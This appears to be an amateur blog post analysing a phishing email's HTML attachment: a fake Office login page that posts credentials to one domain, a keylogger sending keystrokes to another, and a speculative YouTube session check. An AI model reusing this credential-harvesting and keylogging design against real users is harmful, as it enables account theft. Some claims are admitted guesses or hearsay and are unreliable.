Let's Look At Malware I Got From Work
Today we're going to be looking a malware I received from a phishing attempt on my work email. Although I have zero skills in malware analysis, this piece of malware is very simple and uninteresting so this shouldn't take very long.
Here's the email I received (with sensitive information censored). It's a wetransfer download link to a HTML file, so it's already incredibly suspicious because who would send a HTML file? Anyway, let's pop this bad boy into a virtual machine.
Fun fact: I forgot to create a snapshot before opening the file. Make sure to not do this. As you can see, the file is just a fake Office 356 login page. Which confuses me even more because you can see from the address bar that you aren't logging into Office so why would you put your details in? It also looks more like a Google login page rather than Outlook which is more confusing! Although I have heard that at least two people from my office have tried to use it, so what would I know. Getting back on track, let's go and look at the source code, thankfully it is only HTML and I don't have to do any real reverse engineering as we can just look at the source code in plaintext.
validateForm() is just a function to validate the email address, nothing interesting there. But we can see that it sends a POST request to
kombiservis.co, which would obviously be our attacker's domain.
Going further down there's this interesting piece of code. I have no idea what it does, probably because it interacts with the minified code. Based on how it sets iframeUri to
https://accounts.youtube.com/accounts/CheckConnection, I'm going to go ahead and assume that it attempts to find if you're logged into YouTube and takes your credentials as the link is very similar to
https://accounts.youtube.com/accounts/SetSID which is what Google uses to log you into YouTube when using other Google sites, such as Gmail.
The last piece we're going to look at is this simple keylogger, which puts the keys enter in the tab into the variable keys and sends it as a GET request parameter every 10 seconds to
wq14u.com, which is a different domain to the one we saw earlier.
I've also heard from around the office that it sets up auto delete and reply rules on your email, which is probably something that's done when you enter your credentials into the form and POST them to the server.